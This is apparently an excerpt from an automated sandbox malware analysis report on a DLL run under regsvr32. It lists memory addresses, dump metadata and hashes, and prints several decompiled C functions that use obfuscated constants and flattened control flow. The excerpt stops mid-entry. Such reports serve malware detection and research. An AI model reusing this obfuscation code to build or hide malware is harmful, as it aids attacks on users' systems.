                                                                                                                0x00000000
                                                                                                                0x1003ddeb
                                                                                                                0x1003dd49
                                                                                                                0x1003dd4b
                                                                                                                0x1003dd62
                                                                                                                0x1003dd6a
                                                                                                                0x1003dd6c
                                                                                                                0x1003dd83
                                                                                                                0x1003dd8b
                                                                                                                0x1003dd8d
                                                                                                                0x1003dda4
                                                                                                                0x1003ddac
                                                                                                                0x1003ddae
                                                                                                                0x1003ddbb
                                                                                                                0x1003ddbb
                                                                                                                0x00000000
                                                                                                                0x1003ddae
                                                                                                                0x1003dd9a
                                                                                                                0x1003dd9e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd9e
                                                                                                                0x1003dd79
                                                                                                                0x1003dd7d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd7d
                                                                                                                0x1003dd58
                                                                                                                0x1003dd5c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd5c
                                                                                                                0x1003dcb9
                                                                                                                0x1003dcbb
                                                                                                                0x1003dcd2
                                                                                                                0x1003dcda
                                                                                                                0x1003dcdc
                                                                                                                0x1003dcf3
                                                                                                                0x1003dcfb
                                                                                                                0x1003dcfd
                                                                                                                0x1003dd14
                                                                                                                0x1003dd1c
                                                                                                                0x1003dd1e
                                                                                                                0x1003dd2b
                                                                                                                0x1003dd2b
                                                                                                                0x00000000
                                                                                                                0x1003dd1e
                                                                                                                0x1003dd0a
                                                                                                                0x1003dd0e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd0e
                                                                                                                0x1003dce9
                                                                                                                0x1003dced
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dced
                                                                                                                0x1003dcc8
                                                                                                                0x1003dccc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dccc
                                                                                                                0x1003dc2a
                                                                                                                0x1003dc2c
                                                                                                                0x1003dc43
                                                                                                                0x1003dc4b
                                                                                                                0x1003dc4d
                                                                                                                0x1003dc64
                                                                                                                0x1003dc6c
                                                                                                                0x1003dc6e
                                                                                                                0x1003dc85
                                                                                                                0x1003dc8d
                                                                                                                0x1003dc8f
                                                                                                                0x1003dc9c
                                                                                                                0x1003dc9c
                                                                                                                0x00000000
                                                                                                                0x1003dc8f
                                                                                                                0x1003dc7b
                                                                                                                0x1003dc7f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dc7f
                                                                                                                0x1003dc5a
                                                                                                                0x1003dc5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dc5e
                                                                                                                0x1003dc39
                                                                                                                0x1003dc3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dc3d
                                                                                                                0x1003db9b
                                                                                                                0x1003db9d
                                                                                                                0x1003dbb4
                                                                                                                0x1003dbbc
                                                                                                                0x1003dbbe
                                                                                                                0x1003dbd5
                                                                                                                0x1003dbdd
                                                                                                                0x1003dbdf
                                                                                                                0x1003dbf6
                                                                                                                0x1003dbfe
                                                                                                                0x1003dc00
                                                                                                                0x1003dc0d
                                                                                                                0x1003dc0d
                                                                                                                0x00000000
                                                                                                                0x1003dc00
                                                                                                                0x1003dbec
                                                                                                                0x1003dbf0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dbf0
                                                                                                                0x1003dbcb
                                                                                                                0x1003dbcf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dbcf
                                                                                                                0x1003dbaa
                                                                                                                0x1003dbae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003db11
                                                                                                                0x1003db11
                                                                                                                0x1003db14
                                                                                                                0x1003db18
                                                                                                                0x1003db1a
                                                                                                                0x1003db2d
                                                                                                                0x1003db2d
                                                                                                                0x1003db31
                                                                                                                0x1003db35
                                                                                                                0x1003db37
                                                                                                                0x1003db4a
                                                                                                                0x1003db4a
                                                                                                                0x1003db4e
                                                                                                                0x1003db52
                                                                                                                0x1003db54
                                                                                                                0x1003db67
                                                                                                                0x1003db67
                                                                                                                0x1003db6b
                                                                                                                0x1003db6f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction ID: 2e43dce44dd0faa1b493887848bd187ca71d37d475df302aaa9970346dca1e70
                                                                                                                • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction Fuzzy Hash: 17C17E73D1A9F34E8377D52D605852BEEA2EFC168271BC3A2CCD42F289D6269D04D6D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B8966() {
                                                                                                                				char _v524;
                                                                                                                				signed int _v528;
                                                                                                                				intOrPtr _v532;
                                                                                                                				intOrPtr _v536;
                                                                                                                				signed int _v540;
                                                                                                                				signed int _v544;
                                                                                                                				signed int _v548;
                                                                                                                				signed int _v552;
                                                                                                                				signed int _v556;
                                                                                                                				signed int _v560;
                                                                                                                				signed int _v564;
                                                                                                                				signed int _v568;
                                                                                                                				signed int _v572;
                                                                                                                				signed int _v576;
                                                                                                                				signed int _v580;
                                                                                                                				signed int _v584;
                                                                                                                				signed int _v588;
                                                                                                                				signed int _v592;
                                                                                                                				signed int _v596;
                                                                                                                				signed int _v600;
                                                                                                                				signed int _v604;
                                                                                                                				signed int _v608;
                                                                                                                				signed int _v612;
                                                                                                                				signed int _t202;
                                                                                                                				void* _t203;
                                                                                                                				void* _t209;
                                                                                                                				intOrPtr _t211;
                                                                                                                				signed int _t237;
                                                                                                                				signed int _t238;
                                                                                                                				signed int _t239;
                                                                                                                				signed int _t240;
                                                                                                                				signed int _t241;
                                                                                                                				signed int _t242;
                                                                                                                				signed int* _t245;
                                                                                                                
                                                                                                                				_t245 =  &_v612;
                                                                                                                				_v528 = _v528 & 0x00000000;
                                                                                                                				_v536 = 0xeb8db9;
                                                                                                                				_t209 = 0x75dff71;
                                                                                                                				_v532 = 0x6cdcaa;
                                                                                                                				_v584 = 0x675c1e;
                                                                                                                				_t237 = 0x7b;
                                                                                                                				_v584 = _v584 / _t237;
                                                                                                                				_v584 = _v584 + 0xffff56df;
                                                                                                                				_v584 = _v584 ^ 0x000a8d6f;
                                                                                                                				_v540 = 0xad351e;
                                                                                                                				_t238 = 0x1d;
                                                                                                                				_v540 = _v540 / _t238;
                                                                                                                				_v540 = _v540 ^ 0x000cd12f;
                                                                                                                				_v576 = 0x271ad6;
                                                                                                                				_v576 = _v576 << 9;
                                                                                                                				_v576 = _v576 | 0x8da31b46;
                                                                                                                				_v576 = _v576 ^ 0xcfba0ab5;
                                                                                                                				_v568 = 0x7638f3;
                                                                                                                				_t239 = 0x21;
                                                                                                                				_v568 = _v568 * 0x4c;
                                                                                                                				_v568 = _v568 + 0xffff8105;
                                                                                                                				_v568 = _v568 ^ 0x23140abb;
                                                                                                                				_v556 = 0x9e4795;
                                                                                                                				_v556 = _v556 / _t239;
                                                                                                                				_v556 = _v556 ^ 0x00071ff3;
                                                                                                                				_v596 = 0x7c130f;
                                                                                                                				_v596 = _v596 ^ 0x52e063cf;
                                                                                                                				_t240 = 0x3a;
                                                                                                                				_v596 = _v596 * 0x43;
                                                                                                                				_v596 = _v596 * 0x58;
                                                                                                                				_v596 = _v596 ^ 0xa3079607;
                                                                                                                				_v588 = 0xa0c18c;
                                                                                                                				_v588 = _v588 >> 6;
                                                                                                                				_v588 = _v588 >> 0xa;
                                                                                                                				_v588 = _v588 ^ 0x000549a9;
                                                                                                                				_v544 = 0xa78eb4;
                                                                                                                				_v544 = _v544 << 6;
                                                                                                                				_v544 = _v544 ^ 0x29e5c01f;
                                                                                                                				_v600 = 0xcf7d6f;
                                                                                                                				_v600 = _v600 + 0xffff5289;
                                                                                                                				_v600 = _v600 + 0xffff5d0e;
                                                                                                                				_v600 = _v600 << 8;
                                                                                                                				_v600 = _v600 ^ 0xce2a9719;
                                                                                                                				_v608 = 0x771f9e;
                                                                                                                				_v608 = _v608 / _t240;
                                                                                                                				_v608 = _v608 >> 1;
                                                                                                                				_t241 = 0x5c;
                                                                                                                				_v608 = _v608 / _t241;
                                                                                                                				_v608 = _v608 ^ 0x0003fb75;
                                                                                                                				_v612 = 0xc09b6c;
                                                                                                                				_v612 = _v612 * 0x64;
                                                                                                                				_v612 = _v612 + 0x7cd4;
                                                                                                                				_t242 = 0xf;
                                                                                                                				_v612 = _v612 / _t242;
                                                                                                                				_v612 = _v612 ^ 0x05041644;
                                                                                                                				_v604 = 0xdc0665;
                                                                                                                				_v604 = _v604 + 0x32d4;
                                                                                                                				_v604 = _v604 >> 0xe;
                                                                                                                				_v604 = _v604 << 0xf;
                                                                                                                				_v604 = _v604 ^ 0x01b2fa9a;
                                                                                                                				_v552 = 0x185fb3;
                                                                                                                				_v552 = _v552 + 0xffffcadd;
                                                                                                                				_v552 = _v552 ^ 0x001fa7be;
                                                                                                                				_v560 = 0x669eb5;
                                                                                                                				_v560 = _v560 ^ 0xcc2d92e9;
                                                                                                                				_v560 = _v560 ^ 0xcc4722a4;
                                                                                                                				_v580 = 0x2299ca;
                                                                                                                				_v580 = _v580 | 0xb5d9d5ef;
                                                                                                                				_v580 = _v580 >> 0xb;
                                                                                                                				_v580 = _v580 ^ 0x00165e21;
                                                                                                                				_v564 = 0xc1eeb0;
                                                                                                                				_v564 = _v564 | 0x20ff1cb5;
                                                                                                                				_v564 = _v564 * 0x2c;
                                                                                                                				_v564 = _v564 ^ 0xabfc8e66;
                                                                                                                				_v548 = 0x7128f3;
                                                                                                                				_v548 = _v548 + 0xffff1d40;
                                                                                                                				_v548 = _v548 ^ 0x0074511b;
                                                                                                                				_v572 = 0x274fdc;
                                                                                                                				_v572 = _v572 | 0xd7121b37;
                                                                                                                				_v572 = _v572 + 0xc0c3;
                                                                                                                				_v572 = _v572 ^ 0xd7349354;
                                                                                                                				_v592 = 0x173abb;
                                                                                                                				_v592 = _v592 ^ 0x7790976d;
                                                                                                                				_t202 = _v592 * 0x2d;
                                                                                                                				_v592 = _t202;
                                                                                                                				_v592 = _v592 << 2;
                                                                                                                				_v592 = _v592 ^ 0x0b689a9b;
                                                                                                                				do {
                                                                                                                					while(_t209 != 0x5c9141b) {
                                                                                                                						if(_t209 == 0x75dff71) {
                                                                                                                							_t209 = 0x5c9141b;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t209 == 0x8d656b2) {
                                                                                                                							return E001B7098( &_v524,  &_v524, E001B6998, _v548, 0, _v572, _v592);
                                                                                                                						}
                                                                                                                						if(_t209 != 0xc9a6393) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						_t202 = E001A2263( &_v524, _v552, _v560, _v580);
                                                                                                                						 *_t202 = 0;
                                                                                                                						_t209 = 0x8d656b2;
                                                                                                                					}
                                                                                                                					_push(_v568);
                                                                                                                					_push(0x1a109c);
                                                                                                                					_push(_v576);
                                                                                                                					_t203 = E001BF5D9(_v584, _v540, __eflags);
                                                                                                                					_t211 =  *0x1c4c10; // 0x67d820
                                                                                                                					_t175 = _t211 + 4; // 0x67d824
                                                                                                                					__eflags = _t211 + 0x20c;
                                                                                                                					E001B8EB3(_t175, _t211 + 0x20c, _v556, _v584, _v596,  &_v524, _v588, _t203, _v544);
                                                                                                                					_t202 = E001BF94B(_t203, _v600, _v608, _v612, _v604);
                                                                                                                					_t245 =  &(_t245[0xd]);
                                                                                                                					_t209 = 0xc9a6393;
                                                                                                                					L8:
                                                                                                                					__eflags = _t209 - 0x92e6efe;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				return _t202;
                                                                                                                			}





































                                                                                                                0x001b8b31
                                                                                                                0x001b8b36
                                                                                                                0x001b8b3e
                                                                                                                0x001b8b46
                                                                                                                0x001b8b4e
                                                                                                                0x001b8b56
                                                                                                                0x001b8b5e
                                                                                                                0x001b8b66
                                                                                                                0x001b8b6e
                                                                                                                0x001b8b76
                                                                                                                0x001b8b7e
                                                                                                                0x001b8b83
                                                                                                                0x001b8b8b
                                                                                                                0x001b8b93
                                                                                                                0x001b8ba0
                                                                                                                0x001b8ba4
                                                                                                                0x001b8bac
                                                                                                                0x001b8bb4
                                                                                                                0x001b8bbc
                                                                                                                0x001b8bc4
                                                                                                                0x001b8bcc
                                                                                                                0x001b8bd4
                                                                                                                0x001b8bdc
                                                                                                                0x001b8be4
                                                                                                                0x001b8bec
                                                                                                                0x001b8bf4
                                                                                                                0x001b8bf9
                                                                                                                0x001b8bfd
                                                                                                                0x001b8c02
                                                                                                                0x001b8c0a
                                                                                                                0x001b8c0a
                                                                                                                0x001b8c14
                                                                                                                0x001b8c46
                                                                                                                0x00000000
                                                                                                                0x001b8c46
                                                                                                                0x001b8c18
                                                                                                                0x00000000
                                                                                                                0x001b8ce4
                                                                                                                0x001b8c20
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b8c36
                                                                                                                0x001b8c3f
                                                                                                                0x001b8c42
                                                                                                                0x001b8c42
                                                                                                                0x001b8c4a
                                                                                                                0x001b8c4e
                                                                                                                0x001b8c53
                                                                                                                0x001b8c5f
                                                                                                                0x001b8c80
                                                                                                                0x001b8c86
                                                                                                                0x001b8c89
                                                                                                                0x001b8c8f
                                                                                                                0x001b8ca9
                                                                                                                0x001b8cae
                                                                                                                0x001b8cb1
                                                                                                                0x001b8cb3
                                                                                                                0x001b8cb3
                                                                                                                0x001b8cb3
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 27ba701e575935cc68741c7e6a95c782b330e1c1f759945b44aae078ec8bf49d
                                                                                                                • Instruction ID: d71aa4cc8338781cfead5bf61d114561fc1bd382b85a2e1ff40962d83941b4be
                                                                                                                • Opcode Fuzzy Hash: 27ba701e575935cc68741c7e6a95c782b330e1c1f759945b44aae078ec8bf49d
                                                                                                                • Instruction Fuzzy Hash: 739131B11083819FC358CF66C98A95BFBF1FBC5758F008A1DF19686260D7B18A49CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B604B() {
                                                                                                                				char _v524;
                                                                                                                				void* _v536;
                                                                                                                				intOrPtr _v540;
                                                                                                                				signed int _v544;
                                                                                                                				signed int _v548;
                                                                                                                				signed int _v552;
                                                                                                                				signed int _v556;
                                                                                                                				signed int _v560;
                                                                                                                				signed int _v564;
                                                                                                                				signed int _v568;
                                                                                                                				signed int _v572;
                                                                                                                				signed int _v576;
                                                                                                                				signed int _v580;
                                                                                                                				signed int _v584;
                                                                                                                				signed int _v588;
                                                                                                                				signed int _t157;
                                                                                                                				signed int _t158;
                                                                                                                				signed int _t161;
                                                                                                                				void* _t168;
                                                                                                                				void* _t170;
                                                                                                                				signed int _t176;
                                                                                                                				signed int _t177;
                                                                                                                				signed int _t192;
                                                                                                                				signed int _t193;
                                                                                                                				signed int _t194;
                                                                                                                				signed int _t195;
                                                                                                                				signed int _t197;
                                                                                                                				signed int* _t198;
                                                                                                                
                                                                                                                				_t198 =  &_v588;
                                                                                                                				_v540 = 0x6adb49;
                                                                                                                				asm("stosd");
                                                                                                                				_t168 = 0;
                                                                                                                				_t193 = 0x65;
                                                                                                                				asm("stosd");
                                                                                                                				_t170 = 0xbb617a2;
                                                                                                                				asm("stosd");
                                                                                                                				_v568 = 0x35c855;
                                                                                                                				_v568 = _v568 ^ 0xd0e5b4d9;
                                                                                                                				_v568 = _v568 | 0x470d70a5;
                                                                                                                				_v568 = _v568 / _t193;
                                                                                                                				_v568 = _v568 ^ 0x02204fb4;
                                                                                                                				_v556 = 0x408d04;
                                                                                                                				_v556 = _v556 + 0xffffed1d;
                                                                                                                				_t194 = 0x11;
                                                                                                                				_v556 = _v556 * 0x56;
                                                                                                                				_v556 = _v556 ^ 0x15a75506;
                                                                                                                				_v560 = 0xf34dff;
                                                                                                                				_v560 = _v560 + 0x812a;
                                                                                                                				_v560 = _v560 ^ 0x00f32eab;
                                                                                                                				_v544 = 0xb810da;
                                                                                                                				_v544 = _v544 ^ 0xf90f0978;
                                                                                                                				_v544 = _v544 << 4;
                                                                                                                				_v544 = _v544 ^ 0x9b74499c;
                                                                                                                				_v548 = 0xbe1d5f;
                                                                                                                				_v548 = _v548 >> 9;
                                                                                                                				_v548 = _v548 + 0x8259;
                                                                                                                				_v548 = _v548 ^ 0x000ba1a8;
                                                                                                                				_v580 = 0x1dccde;
                                                                                                                				_v580 = _v580 >> 8;
                                                                                                                				_v580 = _v580 >> 0xc;
                                                                                                                				_v580 = _v580 << 0xd;
                                                                                                                				_v580 = _v580 ^ 0x000e3609;
                                                                                                                				_v576 = 0xabb704;
                                                                                                                				_v576 = _v576 | 0x8aaf3382;
                                                                                                                				_v576 = _v576 * 0x1f;
                                                                                                                				_v576 = _v576 | 0xe6abad98;
                                                                                                                				_v576 = _v576 ^ 0xefe40ed9;
                                                                                                                				_v564 = 0x5fa0c2;
                                                                                                                				_v564 = _v564 ^ 0x6a1c19f4;
                                                                                                                				_v564 = _v564 | 0x5d05cf99;
                                                                                                                				_v564 = _v564 ^ 0x09706298;
                                                                                                                				_v564 = _v564 ^ 0x763ac877;
                                                                                                                				_v588 = 0xcb0e84;
                                                                                                                				_v588 = _v588 << 4;
                                                                                                                				_v588 = _v588 << 0xe;
                                                                                                                				_v588 = _v588 + 0xfffff623;
                                                                                                                				_v588 = _v588 ^ 0x3a0d9f99;
                                                                                                                				_v572 = 0xbca862;
                                                                                                                				_v572 = _v572 / _t194;
                                                                                                                				_v572 = _v572 ^ 0x3b386107;
                                                                                                                				_t195 = 0x2c;
                                                                                                                				_v572 = _v572 * 0x5c;
                                                                                                                				_v572 = _v572 ^ 0x467e887f;
                                                                                                                				_v552 = 0xb828dc;
                                                                                                                				_v552 = _v552 ^ 0x52fd841f;
                                                                                                                				_v552 = _v552 << 0xd;
                                                                                                                				_v552 = _v552 ^ 0xb59258f3;
                                                                                                                				_v584 = 0x1cb3ea;
                                                                                                                				_v584 = _v584 / _t195;
                                                                                                                				_v584 = _v584 >> 0xb;
                                                                                                                				_v584 = _v584 + 0xa7f3;
                                                                                                                				_v584 = _v584 ^ 0x000163a2;
                                                                                                                				_t197 = _v560;
                                                                                                                				_t196 = _v560;
                                                                                                                				_t192 = _v560;
                                                                                                                				do {
                                                                                                                					while(_t170 != 0x5fde0b) {
                                                                                                                						if(_t170 == 0x198d58e) {
                                                                                                                							_t158 = E001AB9F6(_v588, _v572, _v552, _t197, _v584);
                                                                                                                							_t198 =  &(_t198[3]);
                                                                                                                							_t192 = _t158;
                                                                                                                							_t170 = 0xc0ff2c9;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t170 == 0x35c3a6f) {
                                                                                                                							_t161 = E001ACA3C();
                                                                                                                							_t196 = _t161;
                                                                                                                							__eflags = _t161;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								L9:
                                                                                                                								return _t168;
                                                                                                                							}
                                                                                                                							_t170 = 0x5fde0b;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t170 == 0x558fff6) {
                                                                                                                							_t197 = E001A2263( &_v524, _v580, _v576, _v564);
                                                                                                                							_t170 = 0x198d58e;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t170 == 0xbb617a2) {
                                                                                                                							_t170 = 0x35c3a6f;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t170 != 0xc0ff2c9) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_v588 = 0xa9eeb7;
                                                                                                                						_t176 = 0x17;
                                                                                                                						_v588 = _v588 / _t176;
                                                                                                                						_v588 = _v588 + 0xffffa90d;
                                                                                                                						_t177 = 0x33;
                                                                                                                						_v588 = _v588 / _t177;
                                                                                                                						_v588 = _v588 ^ 0x2a272383;
                                                                                                                						if(_t192 == _v588) {
                                                                                                                							_t168 = 1;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_t157 = E001B7B9E(_t196, _v560, __eflags, _t170, _v544,  &_v524, _v548);
                                                                                                                					_t198 =  &(_t198[4]);
                                                                                                                					__eflags = _t157;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t170 = 0xbfe24ca;
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					_t170 = 0x558fff6;
                                                                                                                					continue;
                                                                                                                					L18:
                                                                                                                					__eflags = _t170 - 0xbfe24ca;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L9;
                                                                                                                			}
































                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a510fda98223d10257bcb803cfd692c3c2debb1c13b50d92633ddf5ea6a8b6c
                                                                                                                • Instruction ID: f6593087dd837a84deabd2f1d0aea8f4a61924ea905a2b03c14cd72d3a56753c
                                                                                                                • Opcode Fuzzy Hash: 7a510fda98223d10257bcb803cfd692c3c2debb1c13b50d92633ddf5ea6a8b6c
                                                                                                                • Instruction Fuzzy Hash: C27163721093419FD348CE25D68945FBBE1FBD8708F005A1DF69AA6260D7B88A09CF53
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001B86EE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                				char _v564;
                                                                                                                				intOrPtr _v576;
                                                                                                                				char _v588;
                                                                                                                				signed int _v592;
                                                                                                                				signed int _v596;
                                                                                                                				signed int _v600;
                                                                                                                				signed int _v604;
                                                                                                                				signed int _v608;
                                                                                                                				signed int _v612;
                                                                                                                				signed int _v616;
                                                                                                                				signed int _v620;
                                                                                                                				signed int _v624;
                                                                                                                				signed int _v628;
                                                                                                                				signed int _v632;
                                                                                                                				void* __ecx;
                                                                                                                				void* _t97;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t113;
                                                                                                                				intOrPtr _t133;
                                                                                                                				signed int _t134;
                                                                                                                				void* _t137;
                                                                                                                				void* _t138;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t133 = _a4;
                                                                                                                				_push(E001A26A7);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_t133);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t97);
                                                                                                                				_v596 = 0xccb994;
                                                                                                                				_t138 = _t137 + 0x18;
                                                                                                                				_v596 = _v596 + 0x96b3;
                                                                                                                				_v596 = _v596 ^ 0x00cd5045;
                                                                                                                				_t113 = 0xe87706f;
                                                                                                                				_v616 = 0x76da11;
                                                                                                                				_v616 = _v616 | 0xc3c3c914;
                                                                                                                				_v616 = _v616 + 0xffff7ad2;
                                                                                                                				_v616 = _v616 ^ 0xc3f3a7ca;
                                                                                                                				_v600 = 0xea1553;
                                                                                                                				_v600 = _v600 << 3;
                                                                                                                				_v600 = _v600 ^ 0x075971d8;
                                                                                                                				_v608 = 0xdf4688;
                                                                                                                				_v608 = _v608 >> 5;
                                                                                                                				_v608 = _v608 >> 7;
                                                                                                                				_v608 = _v608 ^ 0x0001a885;
                                                                                                                				_v612 = 0xbba49a;
                                                                                                                				_v612 = _v612 | 0xab8380e1;
                                                                                                                				_v612 = _v612 << 0xe;
                                                                                                                				_v612 = _v612 ^ 0xe9310347;
                                                                                                                				_v620 = 0x811a56;
                                                                                                                				_t134 = 0x12;
                                                                                                                				_v620 = _v620 * 0x1a;
                                                                                                                				_v620 = _v620 << 0xb;
                                                                                                                				_v620 = _v620 ^ 0xe56abf12;
                                                                                                                				_v592 = 0xef57cb;
                                                                                                                				_v592 = _v592 << 6;
                                                                                                                				_v592 = _v592 ^ 0x3bdf2cb8;
                                                                                                                				_v624 = 0x85c168;
                                                                                                                				_v624 = _v624 + 0xe5b1;
                                                                                                                				_v624 = _v624 ^ 0x0053cabc;
                                                                                                                				_v624 = _v624 ^ 0x00dbab30;
                                                                                                                				_v604 = 0xdf5ae6;
                                                                                                                				_v604 = _v604 >> 5;
                                                                                                                				_v604 = _v604 ^ 0x000073ac;
                                                                                                                				_v628 = 0x4a78db;
                                                                                                                				_v628 = _v628 << 7;
                                                                                                                				_v628 = _v628 + 0x884e;
                                                                                                                				_v628 = _v628 ^ 0x25371f16;
                                                                                                                				_v632 = 0x2f78d5;
                                                                                                                				_v632 = _v632 + 0x1839;
                                                                                                                				_v632 = _v632 + 0xa37b;
                                                                                                                				_t135 = _v604;
                                                                                                                				_v632 = _v632 / _t134;
                                                                                                                				_v632 = _v632 ^ 0x000a9a95;
                                                                                                                				do {
                                                                                                                					while(_t113 != 0x3d831a) {
                                                                                                                						if(_t113 == 0xf23233) {
                                                                                                                							_t106 = E001BFC9E(_v620, _t135, _v592,  &_v564, _v624);
                                                                                                                							_t138 = _t138 + 0xc;
                                                                                                                							L9:
                                                                                                                							asm("sbb ecx, ecx");
                                                                                                                							_t113 = ( ~_t106 & 0xfee5a2cb) + 0x157e04f;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t113 == 0x157e04f) {
                                                                                                                							return E001B02D8(_t135, _v604, _v628, _v632);
                                                                                                                						}
                                                                                                                						if(_t113 != 0xab35f45) {
                                                                                                                							if(_t113 == 0xbc57fe5) {
                                                                                                                								_v564 = 0x22c;
                                                                                                                								_t106 = E001A823E(_t135, _v608, _v612,  &_v564);
                                                                                                                								goto L9;
                                                                                                                							} else {
                                                                                                                								if(_t113 != 0xe87706f) {
                                                                                                                									goto L16;
                                                                                                                								} else {
                                                                                                                									_v576 = _t133;
                                                                                                                									_t113 = 0xab35f45;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_push(_t113);
                                                                                                                						_push(_t113);
                                                                                                                						_t106 = E001ABE5E(_v596);
                                                                                                                						_t135 = _t106;
                                                                                                                						if(_t106 != 0xffffffff) {
                                                                                                                							_t113 = 0xbc57fe5;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						return _t106;
                                                                                                                						L20:
                                                                                                                					}
                                                                                                                					if(E001A26A7( &_v564,  &_v588) == 0) {
                                                                                                                						_t113 = 0x157e04f;
                                                                                                                						goto L16;
                                                                                                                					} else {
                                                                                                                						_t113 = 0xf23233;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L20;
                                                                                                                					L16:
                                                                                                                				} while (_t113 != 0x6722dea);
                                                                                                                				return _t106;
                                                                                                                			}


























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 4f93a5e54878230d43692652f527e9b756212f7c7ea296bddbd07015ad04af84
                                                                                                                • Instruction ID: 6bf4d895793e4322afac4decbb2754d617c4217bc065db69b4625da2e1bf5bef
